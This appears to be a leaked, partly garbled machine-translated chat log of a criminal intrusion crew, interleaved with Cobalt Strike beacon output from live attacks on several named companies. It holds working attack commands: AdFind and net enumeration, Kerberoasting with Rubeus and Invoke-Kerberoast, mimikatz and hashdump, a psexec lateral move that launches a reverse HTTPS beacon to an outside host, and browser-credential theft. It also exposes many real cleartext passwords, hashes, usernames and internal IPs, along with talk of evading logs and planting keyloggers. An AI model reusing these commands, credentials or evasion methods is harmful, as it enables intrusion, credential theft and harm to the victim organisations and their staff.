>trustType: 1 [Downlevel(1)
>trustAttributes: 4 [Quarantined-Domain(4)]

dn:CN=eu.panavision.com,CN=System,DC=panavision,DC=com
>whenCreated: 2006/03/02-04:33:06 Pacific Daylight Time
>name: eu.panavision.com
>securityIdentifier: S-1-5-21-2619205848-3123681340-272399168
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: eu.panavision.com
>trustType: 2 [UpLevel(2)
>trustAttributes: 32 [Within-Forest(32)]

dn:CN=sa.panavision.com,CN=System,DC=panavision,DC=com
>whenCreated: 2007/10/25-01:46:47 Pacific Daylight Time
>name: sa.panavision.com
>securityIdentifier: S-1-5-21-486547592-1649593982-2333919999
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: sa.panavision.com
>trustType: 2 [UpLevel(2)
>trustAttributes: 32 [Within-Forest(32)]

dn:CN=na.panavision.com,CN=System,DC=panavision,DC=com
>whenCreated: 2005/09/14-16:49:49 Pacific Daylight Time
>name: na.panavision.com
>securityIdentifier: S-1-5-21-4080305880-3103530751-2544733278
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: na.panavision.com
>trustType: 2 [UpLevel(2)
>trustAttributes: 32 [Within-Forest(32)]

dn:CN=ap.panavision.com,CN=System,DC=panavision,DC=com
>whenCreated: 2006/01/16-15:54:34 Pacific Daylight Time
>name: ap.panavision.com
>securityIdentifier: S-1-5-21-396909831-1571174283-2495636022
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: ap.panavision.com
>trustType: 2 [UpLevel(2)
>trustAttributes: 32 [Within-Forest(32)]

dn:CN=panavision.com,CN=System,DC=sa,DC=panavision,DC=com
>whenCreated: 2007/10/25-01:47:46 Pacific Daylight Time
>name: panavision.com
>securityIdentifier: S-1-5-21-4133310860-2374335328-2948649967
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: panavision.com
>trustType: 2 [UpLevel(2)
>trustAttributes: 32 [Within-Forest(32)]

dn:CN=LEEFILTERS.UK,CN=System,DC=panavision,DC=com
>whenCreated: 2018/09/25-16:33:19 Pacific Daylight Time
>name: LEEFILTERS.UK
>securityIdentifier: S-1-5-21-2580217452-235510033-4179086628
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: LEEFILTERS.UK
>trustType: 2 [UpLevel(2)
>trustAttributes: 24 [Transitive(8);Cross-Organization(16)]


10 Objects returned

``Well, I mean not in quarantine?
beacon> shell adfind.exe -b DC=panavision,DC=com -f "(objectcategory=person)" > ad_users.txt
[*] Tasked beacon to run: adfind.exe -b DC=panavision,DC=com -f "(objectcategory=person)" > ad_users.txt
[+] host called home, sent: 109 bytes
[+] received output:

AdFind V01.49.00.00cpp Joe Richards (joe@joeware.net) February 2015

ldap_get_next_page_s: [DEN-DCON-01.na.panavision.com] Error 0xa (10) - Referral

beacon> shell adfind.exe -b DC=PANAVISION -f "(objectcategory=person)" > ad_users.txt
[*] Tasked beacon to run: adfind.exe -b DC=PANAVISION -f "(objectcategory=person)" > ad_users.txt
[+] host called home, sent: 102 bytes
[+] received output:

AdFind V01.49.00.00cpp Joe Richards (joe@joeware.net) February 2015

ldap_get_next_page_s: [DEN-DCON-01.na.panavision.com] Error 0xa (10) - Referral

beacon> shell adfind.exe -b DC=eu,DC=panavision,DC=com -f "(objectcategory=person)" > ad_users.txt
[*] Tasked beacon to run: adfind.exe -b DC=eu,DC=panavision,DC=com -f "(objectcategory=person)" > ad_users.txt
[+] host called home, sent: 115 bytes
[+] received output:

AdFind V01.49.00.00cpp Joe Richards (joe@joeware.net) February 2015

ldap_get_next_page_s: [DEN-DCON-01.na.panavision.com] Error 0xa (10) - Referral

``````
>name: panavision.com
>name: PANAVISION
>name: eu.panavision.com
>name: sa.panavision.com
>name: na.panavision.com
>name: ap.panavision.com
>name: LEEFILTERS.UK
``Certain domain is in the trust? I think I got it right...I'm writing the parameter wrong?
beacon> shell adfind.exe -b DC=eu,DC=panavision,DC=com -f "(objectcategory=person)" > ad_users.txt
[*] Tasked beacon to run: adfind.exe -b DC=eu,DC=panavision,DC=com -f "(objectcategory=person)" > ad_users.txt
[+] host called home, sent: 115 bytes
[+] received output:

AdFind V01.49.00.00cpp Joe Richards (joe@joeware.net) February 2015

ldap_get_next_page_s: [DEN-DCON-01.na.panavision.com] Error 0xa (10) - Referral

``I don't understand what bhs has to do with the trusts? did you rubeustus put on the trusts? i mean this[ ](https://mediaeveryone.com/group/panavision-com?msg=F5ysCxAFokCmqCfmF) )and what does this have to do with bhs? i mean kerberostsnaught bhs all the trusts surveyed the domain composition? and you kerberosts trusts? khmg[lolly already acq YES locked))))0 you also threwdanu in the first you went up yes? the problem in going to the truststhat is the case
    DEN-DCON-02.na.panavision.com [DS] Site: Denver
    DEN-DCON-01.na.panavision.com [PDC] [DS] Site: Denver
    WDH-DCON-02.na.panavision.com [DS] Site: Woodland-Hills
The command completed successfully

=============================================

PDC
Alias name administrators
Comment Members can fully administer the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
DEN-DCON-01$
Domain Admins
PVRT\Enterprise Admins
PVRT\wmi.service
=============================================

Group name Domain Admins
Comment Designated administrators of the domain

Members

-------------------------------------------------------------------------------
#yromero adfs.admin Administrator
BackupMgr CZambrana_da exponential
it.deploy it.inventory jharris_da
mpatterson_ea orivera_da PKooiman_da
sanadmin SP_Admin SQLAgent
windchilladmin yromero_ea
pvna\#yromero V@ndals1974


=============================================

``There's an ahaYou here?`` I'm going to fucking explain if I start, it's more confusing, it's easier to actually read it.`` TrustDirection is not a power of attorney, read what I threw downhttp://www.harmj0y.net/blog/redteaming/the-trustpocalypse/так is basically a two-way power of attorney? http://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/почему should that affect trustAttributes? how does it affect trustAttributes? its requests are trusted both inbound and outbound>trustDirection: 3 [Inbound(1);Outbound(2)]````
dn:CN=PANAVISION,CN=System,DC=panavision,DC=com
>whenCreated:2005/09/14-16:51:44 Pacific Daylight Time
>name: PANAVISION
>securityIdentifier: S-1-5-21-202912000-196093339-1136263860
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: PANAVISION
>trustType: 1 [Downlevel(1)
>trustAttributes: 4 [Quarantined-Domain(4)]
``Can you explain this point?
beacon> shell ping -n 1 sa.panavision.com
[*] Tasked beacon to run: ping -n 1 sa.panavision.com
[+] host called home, sent: 58 bytes
[+] received output:

Pinging sa.panavision.com [192.168.64.50] with 32 bytes of data:
Request timed out.

Ping statistics for 192.168.64.50:
    Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),

``And I realized that we have no sa domain migrate to quarantine domain? how to google such questions? in 2 streamsada what did you scan? just range /24 ?too want to work) to the heart ... work, but I do not get up with the office tomorrow))) and you?) yes I am usually here until morninga why do not you sleep? not thick, 2 pcs ?
[*] 10.100.7.15:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:required) (uptime:3w 0d 14h 29m 10s) (guid:{ce3aadf5-49db-4506-983e-b24acd38dfd6}) (authentication domain:PVRT)
[+] 10.100.7.15:445 - Host is running Windows 2016 Standard (build:14393) (name:GBL-DCON-01) (authentication domain:PVRT)
[*] 10.100.7.16:445 - Force SMB1 since SMB fingerprint needs native_lm/native_os information
[*] 10.100.7.14:139 - Force SMB1 since SMB fingerprint needs native_lm/native_os information
[*] 10.100.7.16:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:required) (uptime:3d 12h 33m 11s) (guid:{1466eec3-53c0-4eb4-af7e-1dabe2584051} (authentication domain:PVRT)
[+] 10.100.7.16:445 - Host is running Windows 2016 Standard (build:14393) (name:GBL-DCON-02) (authentication domain:PVRT)
``certainly they will login under one admin account to use gui, for example, ok, the main thing is to check that all yescrch in hashdump 3941 in ad_user 3954ad users long open now i will count with the number of domain users? the client itself is hung? or session? after hashdump see if cobalstrike is hung)
dcsync does not fit into the file ?
```
you could just do the hashdump on the idea, right? ``
C:{\WINDOWS\Temp> del eula.dll
C:WINDOWS/Temp\eula.dll
Access is denied.

C:\WINDOWS\Temp> whoami
friver\i3bdr

I don't think the skis are going wrong then use ntds utill should be here or not here ?from creds export@tl1 what is the syntax ? dcsync can't get into the file ?it's holding the process can't delete the fucking files
100666/rw-rw-rw- 139680 fil 2020-10-06 23:01:55 +0200 eula.dll
40777/rwxrwxrwx 0 dir 2012-06-25 19:57:03 +0200 hsperfdata_SYSTEM
100666/rw-rw-rw- 22101 fil 2020-10-06 23:37:06 +0200 mimikatz.log
``DK in the cob what? Have you got it up? Have you got it up on the grid on your compaNot understood the questionDo you need to get the system up there? OK, that was the original taskDa@tl1 let me first jump (run dll) on the DK, take the dsink, then look for a server, there are lots of options now?
AHyHax[DIV74P-GVNXHV2]TKennedy/7288|202020Oct07 01:02:30> shell dir \\SOLARWINDS\C$\Users
[*] Tasked beacon to run: dir \\SOLARWINDS\C$\Users
[+] host called home, sent: 254 bytes
[+] received output:
 Volume in drive \SOLARWINDS\C$ has no label.
 Volume Serial Number is B6E7-695C

 Directory of \SOLARWINDS\C$\Users

09/02/2020 02:07 PM <DIR> .
09/02/2020 02:07 PM <DIR> .
03/07/2016 10:54 AM <DIR> .NET v2.0
03/07/2016 10:54 AM <DIR> .NET v2.0 Classic
03/07/2016 10:54 AM <DIR> .NET v4.5
03/07/2016 10:54 AM <DIR> .NET v4.5 Classic
09/28/2015 10:52 AM <DIR> Administrator
04/29/2020 12:07 AM <DIR> azure_join@friver.local
03/07/2016 10:54 AM <DIR> Classic .NET AppPool
09/10/2018 09:26 AM <DIR> frtech
08/07/2020 11:23 AM <DIR> KGillisAdmin
06/25/2020 11:14 AM <DIR> mfinniganadmin
10/30/2018 02:20 PM <DIR> MsDtsServer120
10/30/2018 05:06 PM <DIR> MsDtsServer130
07/17/2018 09:52 AM <DIR> MSSQLFDLauncher
10/30/2018 02:20 PM <DIR> MSSQLSERVER
10/30/2018 02:20 PM <DIR> MSSQLServerOLAPService
02/18/2020 10:53 AM <DIR> pcrusieadmin
06/22/2015 03:10 PM <DIR> Public
10/30/2018 02:20 PM <DIR> ReportServer
06/15/2020 10:24 AM <DIR> rgoinsadmin
10/30/2018 02:21 PM <DIR> SQLSERVERAGENT
10/30/2018 05:22 PM <DIR> SQLTELEMETRY
10/30/2018 05:20 PM <DIR> SSASTELEMETRY
10/30/2018 05:06 PM <DIR> SSISTELEMETRY130
               0 File(s) 0 bytes
              25 Dir(s) 43,644,530,688 bytes free

``and the tolist show me C:\users of this serveraha ok + what's the dll? coba? ``dn:CN=SOLARWINDS,OU=Servers,OU=Corporate,DC=FRIVER,DC=LOCAL``
this is the serveri look for the serverdump the hashes))))) finally the toura` ``
AHyHax[DIV74P-GVNXHV2]TKennedy/7288|202020Oct07 00:54:55> shell net use X: \SOLARWINDS\C$ /user:FRIVER\i3bdr 7Fv(l7c5h)Pq
[*] Tasked beacon to run: net use X: \SOLARWINDS\C$ /user:FRIVER\i3bdr 7Fv(l7c5h)Pq
[+] host called home, sent: 280 bytes
[+] received output:
The command completed successfully.

``````
AHyHax[DIV74P-GVNXHV2]TKennedy/7288|202020Oct07 00:51:25> shell net user i3bdr /dom
[*] Tasked beacon to run: net user i3bdr /dom
[+] host called home, sent: 50 bytes
[+] received output:
The request will be processed at a domain controller for domain FRIVER.LOCAL.

User name i3bdr
Full Name i3brd Backup
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never

Password last set ?10/?21/?2016 2:34:30 PM
Password expires Never
Password changeable ?10/??24/?2016 2:34:30 PM
Password required Yes
User may change password Yes

Workstations allowed All
Logon script
User profile
Home directory
Last logon ??10/?6/?2020 5:51:26 PM

Logon hours allowed All

Local Group Memberships
Global Group memberships *Deny_Share_access *CitrixVPNAccess
                             *Domain Users *SQL Administrators
                             *Domain Admins *Payroll-SQLAdmins
The command completed successfully.

``I'm so fucked up, I won't say it again.
AHyHax[DIV74P-GVNXHV2]TKennedy/7288|2020Oct07 00:48:15> jump psexec_psh DIV79-FS-01 https
[*] Tasked beacon to run windows/beacon_https/reverse_https (regbest.com:443) on DIV79-FS-01 via Service Control Manager (PSH)
[+] host called home, sent: 214277 bytes
[-] Could not open service control manager on DIV79-FS-01: 1722
[-] Could not connect to pipe (\DIV79-FS-01\pipe\status_4d6): 53
[+] host called home, sent: 152 bytes
\DIV79-FS-01 \pipe_host sent 152 bytes) \Why are we here just for fun)\and check more YES after you take the hashes off the server as far as possible is not critical no processes YES no one has been here for a long time and the server is not a serverKhat?
	 * Username : i3bdr
	 * Domain : FRIVER
	 * Password : 7Fv(l7c5h)Pq
?`opaaa``
Members

-------------------------------------------------------------------------------
ADFS adminsolar ayoderadmin
azureadmin bhilladmin BlackStratus$
BNelsonAdmin chailadmin CRMadmin
cwilsonadmin datacubepro dpawlakadmin
FaxAdmin gkoontzadmin gzapataadmin
i3bdr jsteffenadmin KGillisAdmin
mfinniganadmin MSOL_43139b2cee97 pcrusieadmin
rgoinsadmin ScaleService
SCCM-01$ sccmadmin sonicwalladmin
veeambr vmadmin
``user3 mimic if only that was taken off what else? said that now will remove only that was taken off or only that was taken off? this is not an answer) took off the lexabyl or took off? only hashdump the rest was taken off? the car is ancient, do not check the creed``
AHyHax[DIV74P-GVNXHV2]TKennedy/7288|202020Oct07 00:30:06> shell net use X: \cor-crm-02.friver.local\C$ /user:cor-crm-02\Administrator Shotgun913
[*] Tasked beacon to run: net use X: \cor-crm-02.friver.local\C$ /user:cor-crm-02\Administrator Shotgun913
[+] host called home, sent: 112 bytes
[+] received output:
System error 384 has occurred.

You can't connect to the file share because it's not secure. This share requires the obsolete SMB1 protocol, which is unsafe and could expose your system to attack.
Your system requires SMB2 or higher. For more info on resolving this issue, see: https://go.microsoft.com/fwlink/?linkid=852747

``Now alexei will run the dll and continue the work if it works - I'll send it right away nea (managed to determine the pass from FaxAdmin ?Ok, now I will throw the ad infona citrix under sox - from there we call kmd and draw citra, I wonder where it will lead even auchivmentvektor open `` ``
URL : http://citrixweb-01/Citrix/XenApp/auth/login.aspx
Username : tkennedy
Password : Forest5454#
``+`psinject 7288 x64 Invoke-Kerberoast -OutputFormat HashCat | fl | Out-File -FilePath c:\ProgramData\hashes.txt -append -force -encoding UTF8 ``Why not, let it lie there the point of Invoke-Kerberos ?took+without admincount`execute-assembly Rubeus.exe kerberoast /ldapfilter:'admincount=1' /format:hashcat /outfile:C:\ProgramData\Rubeus_hashes.txt````
AHyHax[DIV74P-GVNXHV2]TKennedy/7288|202020Oct06 18:52:54> shell net group "domain admins" /dom
[*] Tasked beacon to run: net group "domain admins" /dom
[+] host called home, sent: 61 bytes
[+] received output:
The request will be processed at a domain controller for domain FRIVER.LOCAL.

Group name Domain Admins
Comment Designated administrators of the domain

Members

-------------------------------------------------------------------------------
ADFS adminsolar ayoderadmin
azureadmin bhilladmin BlackStratus$
BNelsonAdmin chailadmin CRMadmin
cwilsonadmin datacubepro dpawlakadmin
FaxAdmin gkoontzadmin gzapataadmin
i3bdr jsteffenadmin KGillisAdmin
mfinniganadmin MSOL_43139b2cee97 pcrusieadmin
rgoinsadmin ScaleService
SCCM-01$ sccmadmin sonicwalladmin
veeambr vmadmin
The command completed successfully.

``````
AHyHax[DIV74P-GVNXHV2]TKennedy/7288|202020Oct06 18:57:21> shell net group "Enterprise Admins" /dom
[*] Tasked beacon to run: net group "Enterprise Admins" /dom
[+] host called home, sent: 65 bytes
[+] received output:
The request will be processed at a domain controller for domain FRIVER.LOCAL.

Group name Enterprise Admins
Comment Designated administrators of the enterprise

Members

-------------------------------------------------------------------------------
pcrusieadmin rgoinsadmin
The command completed successfully.

``````
AHyHax[DIV74P-GVNXHV2]TKennedy/7288|202020Oct06 18:58:27> shell net localgroup Administrators
[*] Tasked beacon to run: net localgroup Administrators
[+] host called home, sent: 60 bytes
[+] received output:
Alias name Administrators
Comment

Members

-------------------------------------------------------------------------------
Administrator
FRIVER\Domain Admins
FRIVER/Local Desktop Administrators
FRIVER\teledata
FRTech
The command completed successfully.

``Everything, leave it as it is and just go to lpe and so ona dll delete or leave it ?keep working + not deleted+`C:\Users\tkennedy\AppData\Local\Microsoft\Office` - here the dll
`olkexplorer.officeUI.dll` - I'll call it `7 out.7z file.txt file2.txt file3.txt` thank you` 7z ?))See you all tomorrow, thank you all))restart the clientbut it[ ](https://mediaeveryone.com/channel/general?msg=ZF8QdG6YHpW3E5Q5h) that is hanging? More precisely teem server, probably hangs after lunch give more sessions@user1 once said that you need time to put the records on modules and vectors in order, before lunch can do this yesThe second command helps first from emeralmatherials.com?
Our sessions:hiDo they? 2 with the other2 with one teamaWe're 4 here with the second team yet?Good morning to allGood morningGood morningGood morningGreetings)See you soon) Well, on the 5th at 2 in the office) Thank you)) When all said)) Happy New Year)) Thank you) Likewise, and thanks for bearing all our zatupy, with the New Year, all the best and also more bonuses) Thanks) Also happy to work with you @tl2 and the guys in the office, very much from you learned. It was a hard year from all points of view, we went through all sorts of things with you and you have grown a lot since our first meeting, which I am very glad. Especially during the last month you have been working as close as possible and as a team. I am glad we are working together, I hope you will not lose this spirit in the new year. Congratulations to all of you on a happy new year! I wish you happiness, more bonuses, health and a good sleep for the weekend. Thank you all)Very fast and can go away)I will sum up the year in 2 hours)
https://wwhq62nas.us2.quickconnect.to/
https://waterway63.us2.quickconnect.to/
```
```
Waterway
11915Wnas2179!
``What time?'' Well it's also seen in GeneralWe're coming back on the 5th of the dayI @tl2 said that you came of your own accordThank you all for coming today
    WATERWAY\Quser pdiC1137qu!
    WATERWAY\Administrator 1853Gators
    WATERWAY\datavault Waterway727
    WATERWAY\domainrestore Waterway727
    WATERWAY\mapusatera Gators1853
    WATERWAY\veeam_admin 99Waterway
    WATERWAY\Applied Waterway99
    WATERWAY\DBunte Waterway99
    WATERWAY\gkeller Waterway76
    WATERWAY\SEnglert Waterway99!

    waterway\ssuser pdiC1137ssrs!
    WATERWAY\Fpuser pdiC1137fp!
    WATERWAY\U05 05Blues
```
```
us:
192.168.0.3
Waterway
11915Wnas2179!
````WATERWAY\blauer 11915Admin2179!
User: mapusatera - IP Address: 192.168.0.164
User: DBunte - IP Address: 192.168.90.2
User: gkeller - IP Address: 192.168.0.162
User: Quser - IP Address: 192.168.13.57


LEVASHENKO-PC: 192.168.0.22 mharper
WWSQL: 192.168.0.188 blauer
LAB-OFFICE: 192.168.0.161 Administrator

``and on this all-logins and passwords give separate information about tachka adminsladno so my versionda, i think the new version of ff changed the algorithm as i remember he did not give anything other than mosilla sharpweb kazhiz not workada sharpweb also pusilimozila they have noff separately goes edgewise and chomon itself checks only browsers on the chrome engine sharpchrome all browsers did you kste look only chrome?but after the signal head-on that we're back more likely soon to redo everything they probably rolled back and scored their passwords 2-3 duplicates per YES) and as for passwords I would check their mail for starters as a variant daobvezti them keyloggers, or what ...paper to steal they go there through the network anywaywhy? well, we'll have to go to them then, hulino traces in any case is thereavlya not on the network accesses may be on the paper also if you think so http://infosight.hpe.com/InfoSight/media/cms/active/public/pubs_GUI_Administration_Guide_NOS_50x.whz/unm1501525250368.htmlBy the way, they had folders restore - like from programs to restore deleted files. it's just a word that the accesses to the crash site will be fresh and they rolled back quickly after the first one and the grid goes on the second circle just to think about it after such a clear sign that the fight is not over they probably understand if the grid goes on the second circleHueeeeeeeew))) he probably decided to work from home, bastard)and like now burned him Sharphromium removed passwords, removed logopassword, in chrome handheld browsed the history. did you look for traces of nimble? did you read his mail?) the answer was no. did you check if he was using nimblebrowser or if he had a ms outlook client?I turned on the rdp on it, is there a car? did not find access to the mail have not looked? there is another option, on the synolodji put passwords blauer, perhaps on the nimbles, too, he too. and the logs that is backed up there, how many admins from nimbla group have you been? there only correspondence with the seller and the correspondence on the setting (dock, I've already thrown) there's also a maximum I followed @user7 found information from the pdf checked for these tags and nimbla looked and saw hostnamenimble) I was at the post of several dudes, there on the subject
veeam, backup, pass, sphere, center nothing
I searched the mail with a few dudes about veeam, backup, pass, sphere, center blank. at most on the backup came out that i screenshot, about data stolen network hacked, and allThey probably all it department domain admins - not to get up twice)) and maybe in correspondence lit up something interesting he gets here `` ``
>displayName: Greg Keller
>uSNCreated: 17303
>memberOf: CN=Veeam Admins,OU=SecurtyGroups,OU=Corporate,DC=waterway,DC=com
>memberOf: CN=IT,OU=WW2K Security,OU=SecurtyGroups,OU=Corporate,DC=waterway,DC=com
>memberOf: CN=Nimble Admins,OU=SecurtyGroups,OU=Corporate,DC=waterway,DC=com
>memberOf: CN=ITStaff,OU=SecurtyGroups,OU=Corporate,DC=waterway,DC=com
>memberOf: CN=Office,OU=SecurtyGroups,OU=Corporate,DC=waterway,DC=com
>memberOf: CN=OfficeSQL,OU=SQLGroups,OU=SecurtyGroups,OU=Corporate,DC=waterway,DC=com
>memberOf: CN=OnlyOffice,OU=SecurtyGroups,OU=Corporate,DC=waterway,DC=com
>memberOf: CN=Domain Admins,OU=SecurtyGroups,OU=Corporate,DC=waterway,DC=com
But he's just because he's a developer they have an internal portal, maybe you should still look there no keller is a developer. they have blauer did you remove his access from the outlook? gkeller is 60% sure that this guy has access to the mail there so what about us with the outlook?
WATERWAY\U05
05Blues
``[ ](https://mediaeveryone.com/group/waterway-com?msg=DhHDNhcrjFT5CcYtP) where did you get this? ``05Blues``031bac9c9ef2cfcc9b630ab7fae8c0ed as well as on rootlintam still has an alert for temperature``
Message: Temperature sensor bp-temp1 on shelf AF-180176 at left-side backplane is 33 Celsius. Check air temperature and air flow around the array.
````https://wwhq62nas.us2.quickconnect.to/ ``the rdp port is open the rest is nottpio writes login was from this ipai ask what the rdp know) ``ww-nimble-01 `` is the nibble which is 192.168.0.75 what do we have here?
127.0.1.2:3389
``````
Time: Wed Oct 7 10:58:43 2020
Type: 14806
ID: 13472
Message: Root login to controller A from 127.0.1.2 succeeded.

Group Name: Group1
Array name: ww-nimble-01
Serial: AF-180176
Version: 4.5.2.0-553085-opt

Arrays in the group:
---------------------+-----------------+-----------+----------------
Name Serial Model Version
---------------------+-----------------+-----------+----------------
ww-nimble-01 AF-180176 CS1000 4.5.2.0-553085-opt


CONFIDENTIALITY NOTICE: The materials enclosed with this email transmission are private and confidential. The information contained in the material is privileged and is intended only for the use of the individual(s) or entity(ies) named above. If you are not the intended recipient, be advised that unauthorized use, disclosure, copying, distribution or the taking of any action in reliance on the contents of this emailed information is strictly prohibited. If you have received this email transmission in error, please notify the sender immediately by return email, delete this communication and destroy all copies.
``cloudy?``https://192.168.63.30:5001/`` - same us` ``https://waterway63.us2.quickconnect.to/` - 1 more us``1Vanilla2` give password 096d6208ddf94d8e3fcf87e3e1aa1ebf``
192.168.0.3
Waterway
11915Wnas2179!
``````
--- Chromium Credential (User: blauer) ---
URL :
Username : waterwayapps@gmail.com
Password : 2Vanilla1

--- Chromium Credential (User: blauer) ---
URL : https://auth.vantiv.com/openam/UI/Login
Username : blauer@waterway.com
Password : 11915Iq2179!

--- Chromium Credential (User: blauer) ---
URL :
Username : blauer@waterway.com
Password : 11915Gi2179!

--- Chromium Credential (User: blauer) ---
URL : https://www.serversupply.com/process_order4.asp
Username : blauer@waterway.com
Password : 11915Ss2179

``````
LEVASHENKO-PC: 192.168.0.22 mharper
WWSQL: 192.168.0.188 blauer
LAB-OFFICE: 192.168.0.161 administrator
``No luck? and mail the hostname ``ww-nimble-01``1Vanilla2 ``but there is a client installed check the installed software else``
WATERWAY\gkeller Waterway76
``````
192.168.0.162:3389
if the service is off do you turn it on? if the service is on do you turn it off do you turn it on why do you say the rdp does not let techies in?
21 ftp
22,23 ssh, telnet
80,443 http, https
5900 VNC
3389 Microsoft Terminal Server (rdp)
5631,5632 pcAnywhere
445,1433 MS-SQL Server
3306 MySQL
1521,2483 Oracle
5432 PostgreSQL
5938 nbvdm.th
7199 JMX monitoring port
7000 inter-node cluster
7001 SSL inter-node cluster
9042 CQL Native Transport Port
9160 Thrift DataStax OpsCenter
61620 opscenterd daemon
61621 Agent
8888 Website
1-30,80,443,5900,3389,5631,5632,445,1433,3306,1521,2483,5432,5938,7199,7000,7001,9042,9160,61620,8888,61621
``By the way, here's an addition to the port
0.1:5432") shows that PostgreSQL is listening only for connections originating from the local computer, so we will have to edit the
My mistake.
pcAnywhere was a suite of computer programs by Symantec which allows a user of the pcAnywhere remote program on a computer to connect to a personal computer running the pcAnywhere host if both are connected to interconnected networks and the password is known
``````
PCAnywhere uses ports 5631 (Data port or Transmission Control Protocol [TCP]) and 5632 (Status port or User Datagram Protocol [UDP]) to communicate
``you know what this is?)``192.168.0.75:5432````
192.168.0.75:5432
192.168.0.75:443
192.168.0.75:80

[+] received output:
192.168.0.75:22 (SSH-2.0-OpenSSH_7.4)
Scanner module is complete
``Please pay attention to 2http/chttp what scheme are you connecting to?
    https://192.168.0.42
    https://192.168.0.43
    https://192.168.0.75
    https://192.168.0.77
``what ip?'' No rdp on nimblenet too
User: gkeller - IP Address: 192.168.0.162
``No rdp[ ](https://mediaeveryone.com/group/waterway-com?msg=FBXc3Z2B6XvwaGuKW) here, what's the IP?
WATERWAY\mapusatera Gators1853
``````
  CurrentUser : WATERWAY\mapusatera
  Idletime : 01h:54m:23s:531ms (352463531 milliseconds)
``172.17.112.1 as I understand the pdf says that they are from the AD check only idletimevariant good and from there to chekatmb to them on RDP go to the thing about the Guy nimbala I have on all tacts several IP inputs as I understand + you on the same ip go?[I have a few different ways to get to him, but I don't know how to get to him.
gkeller 134cee9671bb94bffdaefb6f84f5989d
Now that's interesting.
dn:CN=Nimble Admins,OU=SecurtyGroups,OU=Corporate,DC=waterway,DC=com
>objectClass: top
>objectClass: group
>cn: Nimble Admins
>member: CN=Brandon Lauer,CN=Users,DC=waterway,DC=com
>member: CN=Dianne Jarden,OU=OfficeUsers,OU=Corporate,DC=waterway,DC=com
>member: CN=appliedgroup,OU=Special Users,OU=Corporate,DC=waterway,DC=com
>member: CN=Greg Keller,OU=OfficeUsers,OU=Corporate,DC=waterway,DC=com
>member: CN=Mark Harper,OU=OfficeUsers,OU=Corporate,DC=waterway,DC=com
>member: CN=Mike Pusatera,OU=OfficeUsers,OU=Corporate,DC=waterway,DC=com
>member: CN=Administrator,OU=Special Users,OU=Corporate,DC=waterway,DC=com
```
```
blauer
djarden
gkeller waterway76
mharper
mapusatera Gators1853
Administrator 1853Gators
the same with ssx similarly doyten you do not go through rdp via proxy any manipulations with the network are done through a dedik as rdp ssx skl web and so on you still dedik for that, do you connect to the network through ssx proxy?) to summarize: use vince to test ssx accesses with vince also happens, but rarely. in more serious systems on the same level as the current date of connection will hang an error that there was a failed attempt to enter on such and such a day from such and such a path during authorization successful afterwards just if through ssh directly fixed message in the log getsthere is already experience)do not knowhough here, about whether a failed password gets into the log during copying via sabinet - here I will not argue))) I know, constantly use. Not winSCP though, but the usual linux one. but underneath both Ibsch is not pure ssh
WinSCP supports five transfer protocols: SFTP (SSH File Transfer Protocol); FTP (File Transfer Protocol); SCP (Secure Copy Protocol);
Can sshp help? It's the same ssh under the hood, but proxies don't help.
a) you can fuck up your password at least, and this message about failed logon the next time you log on to SCP
b) the alerts to your email
c) Login by proxy proxy proxy so we are through proxy. and I have not heard about vincezp...for the simple reason that if you catch a wrong password you will not leave a passchalk in the form of logs at the login accesses are tested ONLY WITHIN vincezp do not forget```
WATERWAY\Applied Waterway99
``````
local-user admin class manage
password hash
$h$6$yUYGy+aaZlXJHmJn$E6qtQR7QVSx4y2M5eR2N3o6luDGdCZ5iXdLn1a5qGEO/pXQo7Qo2tynxcjVzbNiH2IsvDgEKeye
H2W6DyHkJDA==
service-type telnet http https terminal
authorization-attribute user-role network-admin
authorization-attribute user-role network-operator
#
local-user applied class manage
password hash
$h$6$hKewp2sE1Ks4S7TF$/ymqDpm46U4XCP9njU4FMbDOxm9Gwnk0oC7ScVyhFSwKIn7M42+gfjHGOBIVAtfM1J5tvL3U
xKW4isDfXhCjpw==
``What do you know now about the usefulness of the mail) at the post office admins - where? there is a doc with the settings on the mail screenshot? 22roottakoy and only such and only such ashhostnamevbibee ip on the request backup issued takoene then read))) and procheck passwords through mail can pass keys if we nimbles, what's the point of mail?why should mail have priority or look for a separate tool on git[ ](https://mediaeveryone.com/group/waterway-com?msg=FqeuTwcmZRLrWvD5L) why should mail have priority?
URL : https://mail.datotel.com/
Username : jboden@waterway.com
Password : Moose1234!
``nimbles has ssh, but it's keyed. what can i do to get the creds off putty? user9https://www.stellarinfo.com/article/export-exchange-2010-mailbox-to-pst.php``
Username : Administrator
Domain : ALLOY
Password : j@mez9olk
``Trying to log in to the ehas under dudes that have ``ou=Exchange Administrative Group`` with mailsniper, rumor has it that it doesn`t work[ ](https://mediaeveryone.com/group/rtpcompany-com?msg=aw69Bm6w9zALkpsCB) went to the exh server, opened the exh shell, it fell out with this oneilsniper?
WARNING: No Exchange servers are available in the Active Directory site Suzhou. Connecting to an Exchange server in
another Active Directory site.
WARNING: No Exchange servers are available in the Active Directory site France. Connecting to an Exchange server in
another Active Directory site.
WARNING: No Exchange servers are available in the Active Directory site Indy. Connecting to an Exchange server in
another Active Directory site.
WARNING: No Exchange servers are available in the Active Directory site Orange. Connecting to an Exchange server in
another Active Directory site.
WARNING: No Exchange servers are available in the Active Directory site VA. Connecting to an Exchange server in another
 Active Directory site.
WARNING: No Exchange servers are available in the Active Directory site Singapore. Connecting to an Exchange server in
another Active Directory site.
WARNING: No Exchange servers are available in the Active Directory site Crocket. Connecting to an Exchange server in
another Active Directory site.
WARNING: No Exchange servers are available in the Active Directory site Mexico. Connecting to an Exchange server in
another Active Directory site.
WARNING: No Exchange servers are available in the Active Directory site Germany. Connecting to an Exchange server in
another Active Directory site.
